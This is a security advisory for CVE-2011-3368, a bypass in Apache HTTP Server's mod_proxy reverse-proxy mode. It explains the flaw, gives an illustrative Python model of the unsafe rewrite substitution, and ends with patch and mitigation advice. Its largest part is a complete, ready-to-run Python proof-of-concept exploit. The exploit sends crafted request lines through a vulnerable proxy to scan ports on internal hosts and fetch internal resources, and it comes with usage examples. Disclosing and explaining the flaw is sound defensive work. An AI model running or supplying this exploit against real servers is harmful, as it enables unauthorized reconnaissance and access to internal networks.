Apache HTTP Server mod_proxy Reverse-Proxy Mode Security Restriction Bypass Vulnerability
Release date: 2011-10-06
Update date: 2011-10-06
Affected systems:
Apache Group Apache HTTP Server 2.2.x
Description:
CVE ID: CVE-2011-3368
Apache HTTP Server is an open-source web server from the Apache Software Foundation. It runs on most operating systems and, because of its portability and security record, is one of the most widely deployed web server packages.
The mod_proxy module of Apache HTTP Server has a security vulnerability that a malicious user can exploit to bypass certain security restrictions.
The vulnerability lies in mod_proxy when it is configured in reverse-proxy mode. Configurations that forward requests with a RewriteRule carrying the [P] flag or with ProxyPassMatch, using a pattern that is not anchored to a leading slash (for example `^(.*)`), mishandle request lines whose request-URI does not begin with a slash. A request such as `GET @internal-host:port/ HTTP/1.0` is substituted into a target URL in which the intended back end ends up in the userinfo part and the attacker-supplied host and port become the real destination. The proxy therefore opens a connection to an arbitrary host on the attacker's behalf, typically an internal system that is not directly reachable, and relays its response.
<*Source: Michael Jordon (disclosure@contextis.co.uk)
Links: http://www.contextis.com/research/blog/reverseproxybypass/
http://mail-archives.apache.org/mod_mbox/httpd-announce/201110.mbox/browser
*>
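To make the substitution described above concrete, the following is an added example (not code from this advisory, from Context, or from the Apache project). It models how an unanchored RewriteRule [P] / ProxyPassMatch substitution turns the request line `GET @10.0.0.5:8080/admin/ HTTP/1.0` into a URL whose host is the attacker-chosen internal address, and how anchoring the pattern with a leading slash, the mitigation recommended in the Apache announcement linked above, makes the same request miss the rule. The rule patterns, the back-end name `backend.internal`, the address `10.0.0.5` and the request paths are constructed for this example.

```python
import re
from urllib.parse import urlsplit

# Constructed (pattern, substitution) pairs in the shape of
#   RewriteRule <pattern> <substitution> [P]   or   ProxyPassMatch <pattern> <substitution>
# They are not taken from any real httpd.conf.
UNSAFE_RULE = (r"^(.*)$", "http://backend.internal$1")   # pattern has no leading "/"
SAFE_RULE = (r"^/(.*)$", "http://backend.internal/$1")   # anchored: only real paths match

INTENDED_BACKEND = "backend.internal"


def rewrite(rule, request_uri):
    """Model the mod_rewrite/mod_proxy substitution step.

    Returns the URL the proxy would fetch, or None when the pattern does not
    match the request-URI (in which case the rule is simply skipped)."""
    pattern, substitution = rule
    match = re.match(pattern, request_uri)
    if match is None:
        return None
    # Expand back-references $1..$9 the way mod_rewrite does
    return re.sub(r"\$([1-9])", lambda ref: match.group(int(ref.group(1))), substitution)


def proxied_target(url):
    """(host, port) the proxy would actually connect to for the rewritten URL.

    urlsplit applies the same authority parsing the proxy does: anything before
    an "@" in the authority is userinfo, and the real host follows it."""
    parts = urlsplit(url)
    return parts.hostname, parts.port


def classify(rule, request_uri):
    """'normal'   -> the proxy fetches from its intended back end
    'bypass'   -> the attacker-supplied host in the request-URI wins
    'no-match' -> the rule does not apply to this request-URI"""
    url = rewrite(rule, request_uri)
    if url is None:
        return "no-match"
    host, _ = proxied_target(url)
    return "normal" if host == INTENDED_BACKEND else "bypass"


if __name__ == "__main__":
    # A legitimate request and the crafted request-URI from the advisory, against both rules
    for uri in ("/images/logo.gif", "@10.0.0.5:8080/admin/"):
        for name, rule in (("unsafe", UNSAFE_RULE), ("safe", SAFE_RULE)):
            print(f"{name:6} {uri:24} -> {rewrite(rule, uri)} ({classify(rule, uri)})")
```

With the unsafe rule the crafted request becomes `http://backend.internal@10.0.0.5:8080/admin/`, and the proxy connects to 10.0.0.5:8080; with the anchored rule the same request-URI matches nothing, which is exactly the effect the leading slash is meant to have.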
Test method:
WARNING
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!
http://www.exploit-db.com/download/17969
#!/usr/bin/env python
# CVE-2011-3368 proof of concept by Rodrigo Marcos (http://www.secforce.co.uk)
# The exploit-db original is Python 2 with its indentation lost on this page;
# indentation is restored and the script is ported to Python 3 below.
import getopt
import socket
import sys

# Ports probed on the internal host when no single port (-e) is given
known_ports = [0, 21, 22, 23, 25, 53, 69, 80, 110, 137, 139, 443, 445, 3306, 3389, 5432, 5900, 8080]


def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):
    """Send one crafted request through the reverse proxy and return the raw reply ("" on no reply)."""
    # The request-URI is built as <url>@<internal_host>:<port>/<resource>, so that an
    # unanchored RewriteRule/ProxyPassMatch substitution yields a URL whose authority
    # is the internal host rather than the configured back end.
    get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\r\n"
    get = get + "Host: " + apache_target + "\r\n\r\n"
    remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    remoteserver.settimeout(3)
    try:
        remoteserver.connect((apache_target, int(apache_port)))
        remoteserver.sendall(get.encode())
        return remoteserver.recv(4096).decode(errors="replace")
    except OSError:
        # Connection failure or the 3 s timeout (socket.timeout is an OSError)
        return ""
    finally:
        remoteserver.close()


def get_banner(result):
    """Strip the proxy's response headers; what remains is the body relayed from the internal host."""
    return result[result.find("\r\n\r\n") + 4:]


def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):
    print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
    for port in tested_ports:
        port = str(port)
        result = send_request(url, apache_target, apache_port, internal_target, port, resource)
        # 200/30x: the internal service answered over HTTP.
        # 502 Bad Gateway: the proxy reached the port but got a reply it could not
        # parse as HTTP, i.e. some non-HTTP service is listening there.
        if result.find("HTTP/1.1 200") != -1 or \
           result.find("HTTP/1.1 30") != -1 or \
           result.find("HTTP/1.1 502") != -1:
            print("- Open port: " + port + "/TCP")
            print(get_banner(result))
        elif len(result) == 0:
            # No reply before our timeout: the proxy is still waiting on the internal host
            print("- Filtered port: " + port + "/TCP")
        else:
            # Any other status (e.g. 503) means the proxy could not connect
            print("- Closed port: " + port + "/TCP")


def usage():
    print("CVE-2011-3368 proof of concept by Rodrigo Marcos")
    print("http://www.secforce.co.uk")
    print("usage():")
    print("python apache_scan.py [options]")
    print(" [options]")
    print("  -r: Remote Apache host")
    print("  -p: Remote Apache port (default is 80)")
    print("  -u: URL on the remote web server (default is /)")
    print("  -d: Host in the DMZ (default is 127.0.0.1)")
    print("  -e: Port in the DMZ (enables 'single port scan')")
    print("  -g: GET request to the host in the DMZ (default is /)")
    print("  -h: Help page")
    print("examples:")
    print(" - Port scan of the remote host")
    print("   python apache_scan.py -r www.example.com -u /images/test.gif")
    print(" - Port scan of a host in the DMZ")
    print("   python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local")
    print(" - Retrieve a resource from a host in the DMZ")
    print("   python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html")


def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
    print("CVE-2011-3368 proof of concept by Rodrigo Marcos")
    print("http://www.secforce.co.uk")
    print(" [+] Target: " + apache_target)
    print(" [+] Target port: " + apache_port)
    print(" [+] Internal host: " + internal_target)
    print(" [+] Tested ports: " + str(tested_ports))
    print(" [+] Internal resource: " + resource)


def main():
    # Defaults; -e switches from the known_ports sweep to a single-port probe
    url = "/"
    apache_target = ""
    apache_port = "80"
    internal_target = "127.0.0.1"
    internal_port = ""
    resource = "/"
    try:
        opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])
    except getopt.GetoptError:
        usage()
        sys.exit(2)
    for o, a in opts:
        if o in ("-h", "--help"):
            usage()
            sys.exit(2)
        if o == "-u":
            url = a
        if o == "-r":
            apache_target = a
        if o == "-p":
            apache_port = a
        if o == "-d":
            internal_target = a
        if o == "-e":
            internal_port = a
        if o == "-g":
            resource = a
    if apache_target == "":
        usage()
        sys.exit(2)
    if internal_port != "":
        tested_ports = [internal_port]
    else:
        tested_ports = known_ports
    scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)


if __name__ == "__main__":
    main()
Suggestion:
Vendor patch:
Apache Group
------------
The vendor has released an upgrade patch to fix this security problem; please download it from the vendor's homepage:
http://httpd.apache.org/
Until the patch is applied, the Apache announcement linked above recommends anchoring every proxying RewriteRule and ProxyPassMatch pattern with a leading slash (for example `^/(.*)` instead of `^(.*)`), so that a request-URI that does not begin with "/" cannot match a forwarding rule.